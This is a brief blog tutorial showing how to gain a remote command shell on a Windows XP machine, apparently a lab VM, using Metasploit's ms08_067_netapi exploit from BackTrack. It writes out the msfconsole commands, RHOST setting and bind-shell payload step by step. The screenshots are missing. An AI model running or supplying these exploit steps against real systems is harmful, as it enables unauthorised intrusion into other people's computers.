hack remote pc

HACK REMOTE PC WITH METASPLOIT FRAMEWORK USING BACKTRACK

2gydnax

Hello, friends today I will discuss a very important tutorial.  In this tutorial,  you can see how to hack Remote PC (windows XP) system with Metasploit. There are over 927+ exploits are available  but here I am using netapi exploit which is  a very Powerful exploit for windows XP. Now you see how its work……..

 

Step 1 :- This is my backtrack5  which is an attacker System  now you entered into msfconsole console, for that

                Open console and write msfconsole

 1

 

Step 2 :-  then search a keyword “netapi exploit”.

                Using “search netapi” command.

 2

Step 3 :- here we found 4 type of netapi exploit but I preferred last one is the best exploit so I am going to use last exploit. You just copy that exploit and use it.

            Use windows/smb/ms08_067_netapi  and hit enter

 3

Step 4 :- now you have to set some basic options

                  Set RHOST 192.168.20.129  (this is the address of victim machine)

                  Set PAYLOAD windows/shell_bind_tcp

                  Exploit 

 4

 

Now we see  that  windows xp is successfully exploited . Here you got the cmd of windows xp and Now we have the control on the victim system, let’s do some task on the victim machine.

 5

Now I am showing my xp system snapshot which is a victim machine.

6

I hope you enjoy this tutorial regarding hack remote PC, but it’s a humble request to all of that this tutorial is only for education purpose, please don’t misuse this information.

1 thought on “HACK REMOTE PC WITH METASPLOIT FRAMEWORK USING BACKTRACK

Leave a Reply

Your email address will not be published. Required fields are marked *